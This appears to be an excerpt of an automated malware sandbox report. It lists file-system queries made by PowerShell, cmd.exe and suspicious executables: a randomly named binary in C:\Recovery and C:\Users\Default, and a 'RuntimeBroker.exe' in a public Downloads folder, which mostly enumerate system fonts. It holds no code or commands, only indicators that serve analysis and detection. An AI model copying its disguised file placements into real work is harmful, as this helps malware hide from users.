                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeQueries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
